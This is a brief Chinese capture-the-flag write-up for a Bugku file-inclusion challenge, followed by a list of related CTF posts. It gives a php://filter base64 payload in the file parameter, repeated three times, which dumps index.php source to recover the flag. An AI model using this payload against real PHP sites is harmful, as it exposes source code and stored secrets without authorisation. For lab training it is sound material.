bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
BINGCHN1 天前
RCTF2025-photographer(含环境搭建)
upload·ctf
三七吃山漆4 天前
攻防世界——easy_web
安全·网络安全·web·ctf
麦烤楽鸡翅6 天前
坚持60s (攻防世界)
java·网络安全·jar·ctf·misc·反编译·攻防世界
麦烤楽鸡翅7 天前
give_you_flag(攻防世界)
网络安全·信息安全·ctf·misc·杂项·攻防世界·二维码处理
麦烤楽鸡翅9 天前
pdf(攻防世界)
网络安全·pdf·ctf·misc·杂项·攻防世界·信息竞赛
Pure_White_Sword10 天前
Bugku-web题目-xxx二手交易市场
web安全·网络安全·ctf
unable code14 天前
攻防世界-Misc-can_has_stdio?
网络安全·ctf·misc·1024程序员节
Pure_White_Sword15 天前
Bugku-Web题目-文件包含
web安全·网络安全·ctf·文件包含
unable code17 天前
攻防世界-Misc-SimpleRAR
网络安全·ctf·misc·1024程序员节
麦烤楽鸡翅18 天前
幂数加密(攻防世界)
网络安全·密码学·ctf·crypto·解密·攻防世界·幂数加密